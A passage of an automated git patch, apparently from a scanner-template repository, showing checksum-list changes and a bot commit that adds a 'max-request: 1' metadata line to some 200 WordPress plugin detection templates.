-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7073,7 +7074,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:6c9cfc87c5b22aaab0caf646fafc7c76bd8a671f
+templates-checksum.txt:f8f8caa7d751e88d5097cb4a901b11a372eb48d1
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 67b5054168a687d8ff80ce182abaa1a6e856913d Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Sat, 16 Sep 2023 17:53:33 +0000
Subject: [PATCH 0398/1090] TemplateMan Update [Sat Sep 16 17:53:33 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 http/technologies/wordpress/plugins/loginpress.yaml              | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
